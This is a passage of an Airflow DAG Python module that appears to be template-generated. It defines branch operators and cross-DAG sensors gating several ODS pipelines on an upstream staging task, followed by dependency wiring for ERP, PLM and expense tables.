def branch_D_ODS_PRDxD_STG_INIT__SYS_STS_STG(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_STG_INIT")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_ODS_PRDxD_STG_INIT__SYS_STS_STG", "D_ODS_PRDxD_STG_INIT__SYS_STS_STG"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_ODS_PRDxD_STG_INIT__SYS_STS_STG", "D_ODS_PRDxD_STG_INIT__SYS_STS_STG"]
    return ["proxy_D_ODS_PRDxD_STG_INIT__SYS_STS_STG"]

my_taskid = "BRANCH_D_ODS_PRDxD_STG_INIT__SYS_STS_STG"
BRANCH_D_ODS_PRDxD_STG_INIT__SYS_STS_STG = BranchPythonOperator(
    task_id=my_taskid,
    python_callable=branch_D_ODS_PRDxD_STG_INIT__SYS_STS_STG,
    dag=D_ODS_PRD,
    provide_context=True,
)
my_taskid = "proxy_D_ODS_PRDxD_STG_INIT__SYS_STS_STG"
proxy_D_ODS_PRDxD_STG_INIT__SYS_STS_STG = DummyOperator(
    task_id=my_taskid,
    trigger_rule="none_failed_or_skipped",
    dag=D_ODS_PRD,
)
# Cross-DAG sensor
my_taskid = "D_ODS_PRDxD_STG_INIT__SYS_STS_STG"
D_ODS_PRDxD_STG_INIT__SYS_STS_STG = ExternalTaskSensor(
    pool="sensor_pool",
    task_id=my_taskid,
    external_dag_id="D_STG_INIT",
    external_task_id="SYS_STS_STG",
    mode="reschedule",
    dag=D_ODS_PRD,
    check_existence=True,
    timeout=60 * 60 * 1,
    retries=5,
    retry_delay=timedelta(minutes=3),
    execution_date_fn=sqlg_exec_date_fn,
)
BRANCH_D_ODS_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_PRDxD_STG_INIT__SYS_STS_STG)
BRANCH_D_ODS_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(D_ODS_PRDxD_STG_INIT__SYS_STS_STG)
D_ODS_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_PRDxD_STG_INIT__SYS_STS_STG)
def branch_D_ODS_QAMxD_STG_INIT__SYS_STS_STG(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_STG_INIT")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG", "D_ODS_QAMxD_STG_INIT__SYS_STS_STG"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG", "D_ODS_QAMxD_STG_INIT__SYS_STS_STG"]
    return ["proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG"]

my_taskid = "BRANCH_D_ODS_QAMxD_STG_INIT__SYS_STS_STG"
BRANCH_D_ODS_QAMxD_STG_INIT__SYS_STS_STG = BranchPythonOperator(
    task_id=my_taskid,
    python_callable=branch_D_ODS_QAMxD_STG_INIT__SYS_STS_STG,
    dag=D_ODS_QAM,
    provide_context=True,
)
my_taskid = "proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG"
proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG = DummyOperator(
    task_id=my_taskid,
    trigger_rule="none_failed_or_skipped",
    dag=D_ODS_QAM,
)
# Cross-DAG sensor
my_taskid = "D_ODS_QAMxD_STG_INIT__SYS_STS_STG"
D_ODS_QAMxD_STG_INIT__SYS_STS_STG = ExternalTaskSensor(
    pool="sensor_pool",
    task_id=my_taskid,
    external_dag_id="D_STG_INIT",
    external_task_id="SYS_STS_STG",
    mode="reschedule",
    dag=D_ODS_QAM,
    check_existence=True,
    timeout=60 * 60 * 1,
    retries=5,
    retry_delay=timedelta(minutes=3),
    execution_date_fn=sqlg_exec_date_fn,
)
BRANCH_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG)
BRANCH_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(D_ODS_QAMxD_STG_INIT__SYS_STS_STG)
D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG)
def branch_D_ODS_SCMxD_STG_INIT__SYS_STS_STG(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_STG_INIT")
    # print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
    # print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG", "D_ODS_SCMxD_STG_INIT__SYS_STS_STG"]
    elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG", "D_ODS_SCMxD_STG_INIT__SYS_STS_STG"]
    return ["proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG"]

my_taskid = "BRANCH_D_ODS_SCMxD_STG_INIT__SYS_STS_STG"
BRANCH_D_ODS_SCMxD_STG_INIT__SYS_STS_STG = BranchPythonOperator(
    task_id=my_taskid,
    python_callable=branch_D_ODS_SCMxD_STG_INIT__SYS_STS_STG,
    dag=D_ODS_SCM,
    provide_context=True,
)
my_taskid = "proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG"
proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG = DummyOperator(
    task_id=my_taskid,
    trigger_rule="none_failed_or_skipped",
    dag=D_ODS_SCM,
)
# Cross-DAG sensor
my_taskid = "D_ODS_SCMxD_STG_INIT__SYS_STS_STG"
D_ODS_SCMxD_STG_INIT__SYS_STS_STG = ExternalTaskSensor(
    pool="sensor_pool",
    task_id=my_taskid,
    external_dag_id="D_STG_INIT",
    external_task_id="SYS_STS_STG",
    mode="reschedule",
    dag=D_ODS_SCM,
    check_existence=True,
    timeout=60 * 60 * 1,
    retries=5,
    retry_delay=timedelta(minutes=3),
    execution_date_fn=sqlg_exec_date_fn,
)
BRANCH_D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG)
BRANCH_D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(D_ODS_SCMxD_STG_INIT__SYS_STS_STG)
D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG)
def branch_W_ODS_QAMxD_STG_INIT__SYS_STS_STG(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_STG_INIT")
    # Map both schedule_interval values to comparable ranks; a non-standard
    # interval maps to None.
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        # Non-standard interval: run the sensor only when both DAGs share the
        # same (unrecognized) schedule.
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_W_ODS_QAMxD_STG_INIT__SYS_STS_STG", "W_ODS_QAMxD_STG_INIT__SYS_STS_STG"]
    elif up_sch_interval >= my_sch_interval:
        # Upstream runs at the same or a coarser cadence: sense it only when
        # its latest run coincides with this execution date.
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_W_ODS_QAMxD_STG_INIT__SYS_STS_STG", "W_ODS_QAMxD_STG_INIT__SYS_STS_STG"]
    # Otherwise skip the sensor and follow only the proxy path.
    return ["proxy_W_ODS_QAMxD_STG_INIT__SYS_STS_STG"]
my_taskid = "BRANCH_W_ODS_QAMxD_STG_INIT__SYS_STS_STG"
BRANCH_W_ODS_QAMxD_STG_INIT__SYS_STS_STG = BranchPythonOperator(
    task_id=my_taskid,
    python_callable=branch_W_ODS_QAMxD_STG_INIT__SYS_STS_STG,
    dag=W_ODS_QAM,
    provide_context=True,
)
my_taskid = "proxy_W_ODS_QAMxD_STG_INIT__SYS_STS_STG"
proxy_W_ODS_QAMxD_STG_INIT__SYS_STS_STG = DummyOperator(
    task_id=my_taskid,
    trigger_rule="none_failed_or_skipped",
    dag=W_ODS_QAM,
)
# Cross-DAG sensor
my_taskid = "W_ODS_QAMxD_STG_INIT__SYS_STS_STG"
W_ODS_QAMxD_STG_INIT__SYS_STS_STG = ExternalTaskSensor(
    pool="sensor_pool",
    task_id=my_taskid,
    external_dag_id="D_STG_INIT",
    external_task_id="SYS_STS_STG",
    mode="reschedule",
    dag=W_ODS_QAM,
    check_existence=True,
    timeout=60 * 60 * 1,  # 1 hour
    retries=5,
    retry_delay=timedelta(minutes=3),
    execution_date_fn=sqlg_exec_date_fn,
)
BRANCH_W_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_W_ODS_QAMxD_STG_INIT__SYS_STS_STG)
BRANCH_W_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(W_ODS_QAMxD_STG_INIT__SYS_STS_STG)
W_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_W_ODS_QAMxD_STG_INIT__SYS_STS_STG)
def branch_M_ODS_CUSxD_STG_INIT__SYS_STS_STG(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_STG_INIT")
    # Map both schedule_interval values to comparable ranks; a non-standard
    # interval maps to None.
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        # Non-standard interval: run the sensor only when both DAGs share the
        # same (unrecognized) schedule.
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG", "M_ODS_CUSxD_STG_INIT__SYS_STS_STG"]
    elif up_sch_interval >= my_sch_interval:
        # Upstream runs at the same or a coarser cadence: sense it only when
        # its latest run coincides with this execution date.
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG", "M_ODS_CUSxD_STG_INIT__SYS_STS_STG"]
    # Otherwise skip the sensor and follow only the proxy path.
    return ["proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG"]
my_taskid = "BRANCH_M_ODS_CUSxD_STG_INIT__SYS_STS_STG"
BRANCH_M_ODS_CUSxD_STG_INIT__SYS_STS_STG = BranchPythonOperator(
    task_id=my_taskid,
    python_callable=branch_M_ODS_CUSxD_STG_INIT__SYS_STS_STG,
    dag=M_ODS_CUS,
    provide_context=True,
)
my_taskid = "proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG"
proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG = DummyOperator(
    task_id=my_taskid,
    trigger_rule="none_failed_or_skipped",
    dag=M_ODS_CUS,
)
# Cross-DAG sensor
my_taskid = "M_ODS_CUSxD_STG_INIT__SYS_STS_STG"
M_ODS_CUSxD_STG_INIT__SYS_STS_STG = ExternalTaskSensor(
    pool="sensor_pool",
    task_id=my_taskid,
    external_dag_id="D_STG_INIT",
    external_task_id="SYS_STS_STG",
    mode="reschedule",
    dag=M_ODS_CUS,
    check_existence=True,
    timeout=60 * 60 * 1,  # 1 hour
    retries=5,
    retry_delay=timedelta(minutes=3),
    execution_date_fn=sqlg_exec_date_fn,
)
BRANCH_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG)
BRANCH_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(M_ODS_CUSxD_STG_INIT__SYS_STS_STG)
M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG)
def branch_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG(**context):
    mydag = context["dag"]
    dagbag = DagBag()
    upstream = dagbag.get_dag("D_STG_INIT")
    # Map both schedule_interval values to comparable ranks; a non-standard
    # interval maps to None.
    up_sch_interval = std_interval.get(upstream.schedule_interval)
    my_sch_interval = std_interval.get(mydag.schedule_interval)
    if up_sch_interval is None or my_sch_interval is None:
        # Non-standard interval: run the sensor only when both DAGs share the
        # same (unrecognized) schedule.
        if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
            return ["proxy_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG", "Y_ODS_CUSxD_STG_INIT__SYS_STS_STG"]
    elif up_sch_interval >= my_sch_interval:
        # Upstream runs at the same or a coarser cadence: sense it only when
        # its latest run coincides with this execution date.
        if upstream.latest_execution_date == context["execution_date"]:
            return ["proxy_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG", "Y_ODS_CUSxD_STG_INIT__SYS_STS_STG"]
    # Otherwise skip the sensor and follow only the proxy path.
    return ["proxy_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG"]
my_taskid = "BRANCH_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG"
BRANCH_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG = BranchPythonOperator(
    task_id=my_taskid,
    python_callable=branch_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG,
    dag=Y_ODS_CUS,
    provide_context=True,
)
my_taskid = "proxy_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG"
proxy_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG = DummyOperator(
    task_id=my_taskid,
    trigger_rule="none_failed_or_skipped",
    dag=Y_ODS_CUS,
)
# Cross-DAG sensor
my_taskid = "Y_ODS_CUSxD_STG_INIT__SYS_STS_STG"
Y_ODS_CUSxD_STG_INIT__SYS_STS_STG = ExternalTaskSensor(
    pool="sensor_pool",
    task_id=my_taskid,
    external_dag_id="D_STG_INIT",
    external_task_id="SYS_STS_STG",
    mode="reschedule",
    dag=Y_ODS_CUS,
    check_existence=True,
    timeout=60 * 60 * 1,  # 1 hour
    retries=5,
    retry_delay=timedelta(minutes=3),
    execution_date_fn=sqlg_exec_date_fn,
)
BRANCH_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG)
BRANCH_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(Y_ODS_CUSxD_STG_INIT__SYS_STS_STG)
Y_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG)
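# Note: the branch callables above rely on std_interval (defined elsewhere in
# this module) mapping schedule_interval strings to comparable ranks, so that a
# coarser cadence compares >= a finer one. A minimal sketch of that assumed
# contract, using hypothetical values that are illustrative only and are NOT
# the real std_interval:
_example_std_interval = {"@hourly": 1, "@daily": 24, "@weekly": 168}
# A daily upstream can gate an hourly downstream, but not the other way round.
assert _example_std_interval["@daily"] >= _example_std_interval["@hourly"]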
# XSLT:loop: JOB_FLOW_NAME-and-PRE_JOB: External: END}}
# XSLT:loop: JOB_FLOW_NAME: START{
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_ODS_PRD_SRC.MTL_SYSTEM_ITEMS_B
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(MTL_SYSTEM_ITEMS_B)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(FND_COLUMNS)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(FND_LOOKUP_TYPES)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(FND_LOOKUP_VALUES)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(FND_TABLES)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(MTL_CATEGORIES_B)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(MTL_CATEGORY_SETS_B)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(MTL_CUSTOMER_ITEMS)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(MTL_ITEM_CATALOG_GROUPS_B)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(MTL_ITEM_CATEGORIES)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(MTL_ITEM_STATUS_TL)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(PRJ_WORKTIMEDATA)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(XXPLM_MODEL)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(XXPLM_PROJECT)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(XXPLM_TFD)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(Z_CDOCUMENT_CHECKING_RULE)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(MV_XXPLM_MODEL_CHECKRULE_V)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(XXPLM_EC_CHANGE_TYPE)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(NSP_REQ_HEADERS)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(NSP_REQ_LINES)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(EFLOW_PCS_HEADER_TW)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(EFLOW_PCS_LINEEE_TW)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(EFLOW_PCS_LINEER_TW)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(EFLOW_BTMS_EXPENSEPROJECT_TW)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(MV_PROJECT_ACTIVITY_V)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(MV_XXPLM_CFDMETADATA_V)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_SDM_PRD.SDM_PLM_CATEGORY
proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL.set_downstream(SDM_PLM_CATEGORY)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B.set_downstream(SDM_ITEM)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE.set_downstream(SDM_ECN_REASON)
proxy_D_SDM_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(SDM_XXPLM_EC)
SDM_XXPLM_EC.set_downstream(SDM_ECN_CASE_AFTER_MP)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL.set_downstream(SDM_ECN_CASE_AFTER_MP)
proxy_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT.set_downstream(SDM_ECN_CASE_AFTER_MP)
SDM_UPLOAD_CDOC_COUNT.set_downstream(SDM_CDOC_COMPLETION_RATE)
SDM_TOTAL_CDOC_COUNT.set_downstream(SDM_CDOC_COMPLETION_RATE)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE.set_downstream(SDM_UPLOAD_CDOC_COUNT)
SDM_UPLOAD_CDOC_COUNT.set_downstream(SDM_TOTAL_CDOC_COUNT)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT.set_downstream(SDM_PROJECT_CODE)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS.set_downstream(SDM_TOOLING_TOTAL_EXPENSE)
proxy_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT.set_downstream(SDM_TOOLING_TOTAL_EXPENSE)
SDM_PROJECT_CODE.set_downstream(SDM_TOOLING_TOTAL_EXPENSE)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW.set_downstream(SDM_DMST_AND_INTL_TRAVEL_EXP)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW.set_downstream(SDM_DMST_AND_INTL_TRAVEL_EXP)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW.set_downstream(SDM_DMST_AND_INTL_TRAVEL_EXP)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW.set_downstream(SDM_DMST_AND_INTL_TRAVEL_EXP)
proxy_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE.set_downstream(SDM_RD_LABOR_HOURS_EXPENSE)
SDM_CTF_EXPENSE.set_downstream(SDM_TESTING_EXPENSE)
SDM_EQT_EXPENSE.set_downstream(SDM_TESTING_EXPENSE)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS.set_downstream(SDM_CTF_EXPENSE)
proxy_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT.set_downstream(SDM_CTF_EXPENSE)
SDM_PROJECT_CODE.set_downstream(SDM_CTF_EXPENSE)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS.set_downstream(SDM_EQT_EXPENSE)
proxy_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT.set_downstream(SDM_EQT_EXPENSE)
SDM_PROJECT_CODE.set_downstream(SDM_EQT_EXPENSE)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS.set_downstream(SDM_EPR_MFG_SAMPLE_BUILD_EXP)
proxy_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT.set_downstream(SDM_EPR_MFG_SAMPLE_BUILD_EXP)
SDM_PROJECT_CODE.set_downstream(SDM_EPR_MFG_SAMPLE_BUILD_EXP)
proxy_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP.set_downstream(SDM_EPR_MFG_CONVERSION_COST)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL.set_downstream(SDM_EPR_MFG_CONVERSION_COST)
proxy_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER.set_downstream(SDM_EPR_MFG_CONVERSION_COST)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V.set_downstream(SDM_CDOC_PLANNED_DEV_TIME)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL.set_downstream(SDM_CDOC_PLANNED_DEV_TIME)
SDM_CDOC_PLANNED_DEV_TIME.set_downstream(SDM_PROD_DEV_MLST_DELAY_RATE)
SDM_CDOC_DELAY_TIME.set_downstream(SDM_PROD_DEV_MLST_DELAY_RATE)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL.set_downstream(SDM_CDOC_DELAY_TIME)
SDM_PRODUCT_EXPENSE_BUDGET.set_downstream(SDM_PRODUCT_ACTUAL_EXPENSE)
SDM_DMST_AND_INTL_TRAVEL_EXP.set_downstream(SDM_PRODUCT_ACTUAL_EXPENSE)
SDM_EPR_MFG_CONVERSION_COST.set_downstream(SDM_PRODUCT_ACTUAL_EXPENSE)
SDM_EPR_MFG_SAMPLE_BUILD_EXP.set_downstream(SDM_PRODUCT_ACTUAL_EXPENSE)
SDM_CTF_EXPENSE.set_downstream(SDM_PRODUCT_ACTUAL_EXPENSE)
SDM_EQT_EXPENSE.set_downstream(SDM_PRODUCT_ACTUAL_EXPENSE)
SDM_TOOLING_TOTAL_EXPENSE.set_downstream(SDM_PRODUCT_ACTUAL_EXPENSE)
proxy_D_SDM_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(SDM_PRODUCT_EXPENSE_BUDGET)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_DM_PRD.FCT_PROD_DEV_MLST_DELAY_RATE
proxy_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE.set_downstream(FCT_PROD_DEV_MLST_DELAY_RATE)
proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME.set_downstream(FCT_PROD_DEV_MLST_DELAY_RATE)
proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME.set_downstream(FCT_PROD_DEV_MLST_DELAY_RATE)
proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP.set_downstream(FCT_ECN_CASE_AFTER_MP)
proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST.set_downstream(FCT_EPR_MFG_CONVERSION_COST)
proxy_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE.set_downstream(FCT_TOOLING_TOTAL_EXPENSE)
proxy_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP.set_downstream(FCT_DMST_AND_INTL_TRAVEL_EXP)
proxy_D_DM_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(FCT_RD_LABOR_HOURS_EXPENSE)
proxy_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE.set_downstream(FCT_TESTING_EXPENSE)
proxy_D_DM_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(FCT_TESTING_EXPENSE)
proxy_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE.set_downstream(FCT_TESTING_EXPENSE)
proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP.set_downstream(FCT_TESTING_EXPENSE)
proxy_D_DM_PRDxD_SDM_PRD__SDM_ITEM.set_downstream(DIM_ITEM)
proxy_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY.set_downstream(DIM_PLM_CATEGORY)
proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON.set_downstream(DIM_ECN_REASON)
proxy_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE.set_downstream(DIM_PROJECT_CODE)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_ODS_CUS.ODS_UC_Tier1_OEM_Mapping_Table_WH
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Tier1_OEM_Mapping_Table_WH)
ODS_UC_Tier1_OEM_Mapping_Table_WH.set_downstream(UC_Tier1_OEM_Mapping_Table_STG)
UC_Tier1_OEM_Mapping_Table_STG.set_downstream(ODS_UC_Tier1_OEM_Mapping_Table_LD)
ODS_UC_Tier1_OEM_Mapping_Table_LD.set_downstream(UC_Tier1_OEM_Mapping_Table)
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Customer_Model_Name_WH)
ODS_UC_Customer_Model_Name_WH.set_downstream(UC_Customer_Model_Name_STG)
UC_Customer_Model_Name_STG.set_downstream(ODS_UC_Customer_Model_Name_LD)
ODS_UC_Customer_Model_Name_LD.set_downstream(UC_Customer_Model_Name)
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Pre_Project_information_WH)
ODS_UC_Pre_Project_information_WH.set_downstream(UC_Pre_Project_information_STG)
UC_Pre_Project_information_STG.set_downstream(ODS_UC_Pre_Project_information_LD)
ODS_UC_Pre_Project_information_LD.set_downstream(UC_Pre_Project_information)
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Premium_Freight_WH)
ODS_UC_Premium_Freight_WH.set_downstream(UC_Premium_Freight_STG)
UC_Premium_Freight_STG.set_downstream(ODS_UC_Premium_Freight_LD)
ODS_UC_Premium_Freight_LD.set_downstream(UC_Premium_Freight)
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_RFQ_Freight_Estimate_MAP_WH)
ODS_UC_RFQ_Freight_Estimate_MAP_WH.set_downstream(UC_RFQ_Freight_Estimate_MAP_STG)
UC_RFQ_Freight_Estimate_MAP_STG.set_downstream(ODS_UC_RFQ_Freight_Estimate_MAP_LD)
